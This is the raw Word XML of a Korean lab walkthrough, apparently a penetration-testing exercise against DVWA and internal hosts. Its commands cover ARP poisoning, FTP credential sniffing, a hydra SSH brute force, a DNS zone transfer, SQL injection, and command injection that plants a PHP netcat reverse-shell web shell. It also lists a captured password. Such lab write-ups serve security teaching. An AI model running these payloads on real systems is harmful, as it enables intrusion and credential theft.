
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"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Default Extension="bmp" ContentType="image/bmp"/>
  <Default Extension="png" ContentType="image/png"/>
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/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_top" w:name="_top"/>
    <w:bookmarkEnd w:id="_top"/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/>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="56"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:widowControl w:val="off"/>
              <w:jc w:val="center"/>
              <w:wordWrap w:val="1"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:t>시나리오1 과정</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pP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/>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1586"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="419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539" cy="767334"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="1" name="그림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34.bmp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539" cy="76733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inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2446020" cy="899160"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2" name="그림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35.png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020" cy="89916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70"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="419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칼리서버에서 이더캡 검색</w:t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이더캡 상단 체크</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2068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1057402"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="3" name="그림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36.bmp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1057402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1080389"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="4" name="그림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37.bmp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1080389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92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내부망 Scan for hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="419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기다리자!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2068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1486916"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="5" name="그림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38.bmp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148691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925830"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="6" name="그림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39.bmp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92583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92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스캔 결과 (2개의 Host 발견)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="419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스캔한 Host 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1954"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="419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1050925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="7" name="그림 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3a.bmp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105092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950976"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="8" name="그림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3b.bmp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95097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92"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="419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각 호스트의 IP, Mac 주소 확인</w:t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타겟 설정 방법</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pP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/>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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539" cy="1040765"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="9" name="그림 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3c.bmp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539" cy="104076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539" cy="1051814"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="10" name="그림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3d.bmp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539" cy="105181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92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타겟 Add로 설정</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Target1 : Gateway (라우터)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Target2 : 록키</w:t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ARP posioning</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t># 게이트웨이한테 칼리가 내가 로키야라고 하고 록키한테 내가 게이트웨이야 라고 함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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1043686"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="11" name="그림 1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3e.bmp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104368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339471"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="12" name="그림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3f.bmp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33947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92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타겟1, 2의 각 Mac 주소</w:t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록키서버에서 게이트웨이 Mac주소 칼리로 변경된 것 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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1149223"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="13" name="그림 1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40.bmp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1149223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942848"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="14" name="그림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41.bmp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942848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92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직원이 록키서버에서 웹서버 ftp를 접속함</w:t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와이어샤크를 보던중 ftp 접속한 패킷을 발견! -&gt; ID, Password 탈취</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pP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/>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2548128" cy="1328166"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="15" name="그림 1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4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128" cy="132816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51689</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2534539" cy="1953387"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="16" name="그림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43.bmp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539" cy="1953387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92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nmap -sV -p 22 10.4.0.3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t># 록키의 SSH 포트가 열려있는지 확인</w:t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test.txt 파일</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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948309"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="17" name="그림 1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44.bmp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948309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2000250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="18" name="그림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45.bmp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200025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92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hydra -l root -p /root/test.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t># root 계정 비밀번호 탈취(Brute Force)</w:t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 xml:space="preserve">ssh </w:t>
            </w:r>
            <w:hyperlink w:history="1" r:id="rId19">
              <w:r>
                <w:rPr>
                  <w:color w:val="0000ff"/>
                  <w:u w:val="single" w:color="0000ff"/>
                </w:rPr>
                <w:t>root@10.4.0.3</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t># 탈취한 root 계정과 비밀번호로 ssh 록키서버에 접속</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5317363" cy="1156970"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19" name="그림 1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4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7363" cy="115697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1340739"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="20" name="그림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47.bmp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1340739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92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어라? 이친구 전산팀이구나? 확인</w:t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ssh로 접속하여 /etc/resolve 파일로 DNS 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pP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/>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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539" cy="1249299"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="21" name="그림 2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48.bmp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539" cy="1249299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309372"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="22" name="그림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49.bmp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309372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92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dig axfr wj.com @172.16.18.28</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>#dig 활용하여 DNS서버의 ZONE파일 탈취</w:t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ssh로 록키서버의 WhatWeb 설치</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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453136"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="23" name="그림 2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4a.bmp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45313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1446276"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="24" name="그림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4b.bmp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144627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92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whatweb dvwa.wj.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t># whatweb을 사용하여 관리자 페이지 식별</w:t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칼리서버의 DNS변경</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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1608201"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="25" name="그림 2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4c.bmp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160820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1123188"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="26" name="그림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4d.bmp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1123188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92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취약서버 접속하여 SQL injection</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>' OR '1'='1' #</w:t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127.0.0.1 ; id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t># Ping Test 페이지에서 취약점 확인</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>-&gt; 사용자 권한 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pP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/>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2634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539" cy="1507871"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="27" name="그림 2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4e.bmp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539" cy="150787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539" cy="1260729"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="28" name="그림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4f.bmp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539" cy="1260729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92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127.0.0.1 ; ls -R</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t># 디렉토리 확인 (웹 루트 및 파일 구조 파악)</w:t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127.0.0.1 &amp;&amp; echo """ &lt;?php shell_exec('nc 10.4.0.4 4444 -e /bin/sh'); ?&gt;""" &gt; backdoor.php</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t># Netcat을 활용한 리버스 쉘 페이로드가 포함된 웹쉘(Webshell)을 생성하는 공격 (공격자 칼리 IP 넣기)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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1648841"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="29" name="그림 2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2f.bmp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164884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654304"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="30" name="그림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30.bmp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65430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92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127.0.0.1 ; ls</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t># backdoor.php 파일 생성확인</w:t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nc -lvp 4444</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>#칼리서버에서 포트 4444 열어주기</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2464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29464</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-8636</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2534412" cy="548894"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="31" name="그림 3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31.bmp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54889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582676"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="32" name="그림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32.bmp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58267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  <w:r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908177"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom/>
                  <wp:docPr id="33" name="그림 3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TJ\AppData\Local\Temp\Hnc\BinData\EMB00003bf82d33.bmp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908177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92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 xml:space="preserve">URL에 </w:t>
            </w:r>
            <w:hyperlink w:history="1" r:id="rId35">
              <w:r>
                <w:rPr>
                  <w:color w:val="800080"/>
                  <w:u w:val="single" w:color="800080"/>
                </w:rPr>
                <w:t>http://dvwa.wj.com/vulnerabilities/exec/backdoor.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> 로 접속하면 칼리 커맨더 창에 웹서버의 서버 제어권 획득 확인 (Connect ~ 172.16.18.28) </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pP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  <w:r>
              <w:rPr/>
              <w:t>su wj</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>asd123!@</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t># FTP 패킷으로 획득한 사용자 계정으로 로그인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pP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/>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2803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</w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="936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</w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2803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</w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="935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</w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2803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</w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="935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>
                <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:widowControl w:val="off"/>
              <w:jc w:val="center"/>
              <w:wordWrap w:val="1"/>
            </w:pP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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pP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/>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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</w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="992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</w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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</w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="992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</w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2860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rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="992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>
                <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
                <w:b/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:widowControl w:val="off"/>
              <w:jc w:val="center"/>
              <w:wordWrap w:val="1"/>
            </w:pP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7f4f6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="0"/>
              <w:rPr/>
              <w:widowControl w:val="off"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0"/>
        <w:rPr/>
        <w:widowControl w:val="off"/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:endnotePr>
        <w:pos w:val="docEnd"/>
        <w:numFmt w:val="decimal"/>
        <w:numRestart w:val="continuous"/>
      </w:endnotePr>
      <w:footnotePr>
        <w:numFmt w:val="decimal"/>
        <w:numRestart w:val="continuous"/>
      </w:foot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  <w:pStyle w:val="3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  <w:pStyle w:val="4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  <w:pStyle w:val="5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  <w:pStyle w:val="6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  <w:pStyle w:val="7"/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%1.%1.%1.%1.%1.%1.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stylePaneFormatFilter w:val="0001"/>
  <w:bordersDoNotSurroundFooter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wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬바탕" w:hAnsi="함초롬바탕" w:eastAsia="함초롬바탕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="본문"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:widowControl w:val="off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  <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬바탕" w:hAnsi="함초롬바탕" w:eastAsia="함초롬바탕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="개요 1"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:widowControl w:val="off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  <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬바탕" w:hAnsi="함초롬바탕" w:eastAsia="함초롬바탕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="개요 2"/>
    <w:uiPriority w:val="3"/>
    <w:pPr>
      <w:widowControl w:val="off"/>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:snapToGrid w:val="off"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  <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬바탕" w:hAnsi="함초롬바탕" w:eastAsia="함초롬바탕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="개요 3"/>
    <w:uiPriority w:val="4"/>
    <w:pPr>
      <w:widowControl w:val="off"/>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:snapToGrid w:val="off"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  <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬바탕" w:hAnsi="함초롬바탕" w:eastAsia="함초롬바탕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="개요 4"/>
    <w:uiPriority w:val="5"/>
    <w:pPr>
      <w:widowControl w:val="off"/>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:snapToGrid w:val="off"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  <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬바탕" w:hAnsi="함초롬바탕" w:eastAsia="함초롬바탕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="개요 5"/>
    <w:uiPriority w:val="6"/>
    <w:pPr>
      <w:widowControl w:val="off"/>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:snapToGrid w:val="off"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  <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬바탕" w:hAnsi="함초롬바탕" w:eastAsia="함초롬바탕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="개요 6"/>
    <w:uiPriority w:val="7"/>
    <w:pPr>
      <w:widowControl w:val="off"/>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:snapToGrid w:val="off"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  <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬바탕" w:hAnsi="함초롬바탕" w:eastAsia="함초롬바탕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="개요 7"/>
    <w:uiPriority w:val="8"/>
    <w:pPr>
      <w:widowControl w:val="off"/>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:snapToGrid w:val="off"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  <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬바탕" w:hAnsi="함초롬바탕" w:eastAsia="함초롬바탕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="쪽 번호"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:widowControl w:val="off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  <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬돋움" w:hAnsi="함초롬돋움" w:eastAsia="함초롬돋움"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="머리말"/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:widowControl w:val="off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  <w:wordWrap w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="함초롬돋움" w:hAnsi="함초롬돋움" w:eastAsia="함초롬돋움"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
    </w:rPr>
